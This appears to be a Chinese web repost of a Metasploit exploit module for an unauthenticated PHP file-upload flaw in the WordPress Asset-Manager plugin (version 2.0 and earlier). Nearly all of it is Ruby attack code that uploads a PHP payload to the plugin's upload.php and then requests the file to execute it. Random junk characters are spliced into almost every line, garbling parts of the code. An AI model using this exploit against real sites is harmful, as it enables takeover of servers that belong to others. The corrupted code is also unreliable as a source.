这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。6 W! _5 d) G4 F# q9 I
+ n" W L% @+ R0 h3 ^: f##
7 d5 [9 D( @6 A3 Y( [: `# This file is part of the Metasploit Framework and may be subject to
9 p# D' U" g2 F- d# redistribution and commercial restrictions. Please see the Metasploit
2 _8 ~( p' ~* ^# Framework web site for more information on licensing and terms of use.
/ w- J8 t! [$ l# x/ Q8 x0 |5 m, p# http://metasploit.com/framework/: @" ]2 q% n0 p- Z
##
N2 B" a0 I( }1 D: k1 E 8 Z5 e: R! X* l. s; u. [
require 'msf/core'
9 B/ s. D0 J/ i% \& ` O- mrequire 'msf/core/exploit/php_exe'
6 f' U' j1 W! l* q8 D% B; Q ' f a4 t7 M; q6 p
class Metasploit3 < Msf::Exploit::Remote
B5 m7 C* X! v Rank = ExcellentRanking
! {+ e( ]& P' U; L/ n0 z * f$ h( r8 i9 e- t/ C# I p) W
include Msf::Exploit::Remote::HttpClient
G; y- l4 r/ t$ H) p6 c. `6 B include Msf::Exploit: hpEXE) u' O+ W( @3 c' V$ m% N+ z
0 j4 I# L1 M# q" d- S
def initialize(info = {})" K- c; @! b4 M
super(update_info(info,) n; i. t' p* Q/ V
'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability'," A" f/ h |) H" s9 y( B5 w; d3 `
'Description' => %q{$ I; K6 ~0 `# V4 E+ `1 ^9 h0 g
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress" I* z9 q% j/ T4 ^, V) t
plugin. By abusing the upload.php file, a malicious user can upload a file to a: p1 }' ~* V; W( ]# P4 \0 y
temp directory without authentication, which results in arbitrary code execution.. Q. a, \3 |# l5 N4 P' ^# H
},
+ K' A* J+ f5 p5 ] 'Author' =>5 c0 d9 z; V- y, z9 }
[
7 y, ]) P' m; ~2 E 'Sammy FORGIT', # initial discovery" [( W# U! d2 x# U i; W$ M
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
+ N) t* p- a+ M- R. A ],
. m/ Y( ^; h, m! S9 Q) ?9 X( A2 S2 A 'License' => MSF_LICENSE,
5 j* P! z4 G7 S. n) B$ Z H4 m7 h 'References' =>2 @& s, [2 d& c$ ]* F
[7 _5 V! Z7 Q% r' C/ Z+ o5 `) r, g
[ 'OSVDB', '82653' ],
. O8 ^! G+ k3 }0 Y# N$ g; d8 h [ 'BID', '53809' ],/ ?3 |: P7 ]5 r( C9 i
[ 'EDB', '18993' ],
p6 ^/ H, F0 ` B4 g* u" k [ 'URL', 'http:// www.myhack58.com /' ]
+ P0 b( J+ m, H0 w% d$ H8 j* ^ ],
9 w) L, f5 Z, w* F 'Payload' =>8 c) Y' W& s o- G t* j% V/ S
{
8 B' c. _" T* L. V3 T 'BadChars' => "\x00",. g! a7 c: [9 D! m# d
},
, s, ^2 t5 _# \# c y 'Platform' => 'php',' o+ }; V9 I) a. Q" j2 G
'Arch' => ARCH_PHP,' P7 _! O/ l$ m4 K
'Targets' =>
3 @7 M; c* n$ h& Z8 B5 W8 |& r) [, q, n [
. Q6 L9 I2 t. m; t( Y) _8 H [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
# w0 } L+ h/ R4 \: f* H: n [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
6 x8 V9 x. g; g7 L/ I ],
- \. k& C" R6 v7 u1 c 'DefaultTarget' => 0,
/ x4 w0 a8 a' x" r0 q 'DisclosureDate' => 'May 26 2012')), y* |- f# e) M: t0 U. S
/ b1 D, x7 I U+ z7 o; } register_options(5 ?; L3 a8 P3 ]5 z
[
' ]- L0 I M0 ~; t OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])7 @5 a: { P8 }) n4 h" Q6 v8 @
], self.class)1 ]5 c, |8 W/ D& `) c
end4 D6 \% j. P _, c' W; K
; i0 M% i! T5 n2 o) e: r def exploit$ E1 b/ y- x9 B4 D! q. w
uri = target_uri.path
y+ ?* E. Z$ \# L r uri << '/' if uri[-1,1] != '/'5 h$ W' b% b7 f+ x
peer = "#{rhost}:#{rport}"4 {$ t3 H% p0 ~) |- i, G/ {9 O9 ?
payload_name = "#{rand_text_alpha(5)}.php"7 C+ h. e. {) O/ w
php_payload = get_write_exec_payload(:unlink_self=>true) |$ I4 w& M2 _1 |% Z
# r7 Z) `* G$ N8 ] data = Rex::MIME::Message.new5 l+ Y: Q. _) O s4 [' o, E
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
- @7 F) q& d# v: i1 |1 `& C post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')8 s* ~5 R3 E6 {9 T& Z
* ?3 y. O: O/ Q6 [+ I print_status("#{peer} - Uploading payload #{payload_name}")
# S! v1 ]8 h. e3 E res = send_request_cgi({* R/ T1 i+ j: ?8 B7 y, `- p' K- v
'method' => 'POST',4 [0 J! N/ S/ @9 T0 x: f
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",9 L& R; ^/ G$ f* k+ ?# G
'ctype' => "multipart/form-data; boundary=#{data.bound}",
1 @- d8 v9 t: F 'data' => post_data
6 U5 t( b+ b! r. a })
) f3 O: g& Q0 k' b4 z; |
4 x. P- ^& t, L. I6 s" i if not res or res.code != 200 or res.body !~ /#{payload_name}/
" X% z5 Z$ S$ ^, y4 N fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")! Y; R2 H" ?/ _: x+ w
end8 u# I2 f2 h0 I; v9 O
! S( [0 \" z# ^1 O print_status("#{peer} - Executing payload #{payload_name}")3 G3 f4 }3 C+ V
res = send_request_raw({
1 f# {1 b& [5 g( C 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
# D l8 u, a2 Y, X j) c C0 q+ l" k 'method' => 'GET'8 D) w1 O5 Y5 m
})' X9 e/ }1 [6 P. Q4 M& y
8 b- T+ x; i2 A. I if res and res.code != 200- t5 ?/ H! M. [3 [+ Y i
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")9 ^8 H: i6 v) e Z2 T$ o
end' [! u9 P) @; q: U. m3 {6 m
end& f" x: l0 t! q7 F3 L, e- `" M
end+ c9 Y) L0 H; @+ e
|